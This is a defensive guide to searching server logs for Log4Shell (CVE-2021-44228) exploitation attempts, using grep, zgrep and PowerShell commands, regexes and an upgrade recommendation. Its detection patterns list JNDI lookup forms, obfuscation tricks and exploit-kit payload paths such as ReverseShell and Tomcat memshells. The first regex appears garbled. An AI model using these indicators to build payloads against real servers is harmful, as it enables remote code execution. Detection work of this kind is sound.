You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228.
Related News:
– Log4j RCE Callback Connection
– Live Log4J worldwide threat tracker
- RegEx
^(?:.(?:.(?:.(?:.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))|.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))))|.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))))
- Grep / Zgrep
This command searches for exploitation attempts in uncompressed files in folder /var/log
and all sub folders
sudo egrep -I -i -r '\$({|%7B)jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log
This command searches for exploitation attempts in compressed files in folder /var/log
and all sub folders
sudo find /var/log -name *.gz -print0 | xargs -0 zgrep -E -i '\$({|%7B)jndi:(ldap[s]?|rmi|dns):/[^\n]+'
- Grep / Zgrep – Obfuscated Variants
These commands cover even the obfuscated variants but lack the file name in a match.
This command searches for exploitation attempts in uncompressed files in folder /var/log
and all sub folders
sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -I -i 'jndi:(ldap[s]?|rmi|dns):'" \;
This command searches for exploitation attempts in compressed files in folder /var/log
and all sub folders
sudo find /var/log/ -name "*.log.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;
- Log4Shell Detector (Python)
Python based scanner to detect the most obfuscated forms of the exploit codes.
GitHub – Neo23x0/log4shell-detector: Detector for Log4Shell exploitation attempts
- Find Vulnerable Software (Windows)
gci 'C:\' -rec -force -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path
- Detects indicators of JDNI usage in log files and other payloads
ldap:\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\/
- Detects indicators in server logs that indicate the exploitation of CVE-2021-44228
$\{jndi:(ldap|ldaps|rmi|dns):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}
Recommendation:
Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).